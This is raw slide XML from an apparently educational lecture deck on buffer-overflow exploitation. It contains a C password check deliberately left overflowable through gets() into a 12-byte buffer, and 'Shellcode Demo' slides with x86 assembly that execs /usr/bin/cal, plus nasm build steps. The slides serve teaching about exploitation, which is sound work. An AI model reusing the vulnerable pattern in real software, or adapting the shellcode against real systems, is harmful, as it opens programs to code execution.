              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>PWverify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	puts("Enter your password:");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>PWverify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>IsPasswordValid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	if (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>PWverify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>		puts("Wrong!! Wrong!! Wrong!!");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>		return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>        puts("Welcome. Your password is correct.");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>        system("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>gedit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>IsPasswordValid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	char Password[12];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	gets(Password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	if (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(Password, "secure pro"))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>		return(true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>	else return(false);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="投影片編號版面配置區 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW"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3394720" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Demo (4)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1556792"/>
            <a:ext cx="3816424" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Assembly code to execute /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/bin/cal </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="404664"/>
            <a:ext cx="4104456" cy="5909310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	SECTION .text		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>                      global _start		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>_start:				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	callback	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dowork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	pop	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>edx,edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	push	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	push	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx,esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ebx,esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>eax,eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	al,0xb		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	0x80		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ebx,ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>eax,eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	inc	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	0x80		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>callback:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	call	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dowork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>	db "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>/bin/cal",0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="投影片編號版面配置區 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>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(5)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>nasm</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>nasm -f elf -o bfsv3.o bfsv3.asm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>ld -o bfsv3 bfsv3.o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>./bfsv3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4" descr="擷取選取區域_049.bmp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="4077072"/>
            <a:ext cx="7795337" cy="2232248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="投影片編號版面配置區 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}"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2458616" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Demo (6)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文字方塊 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539553" y="1772816"/>
            <a:ext cx="2376264" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> to observe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>binary code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="圖片 6" descr="擷取選取區域_050.bmp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3275856" y="692696"/>
            <a:ext cx="5172075" cy="5857875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="投影片編號版面配置區 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}"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Simple Lexical Analysis Rule</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5</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
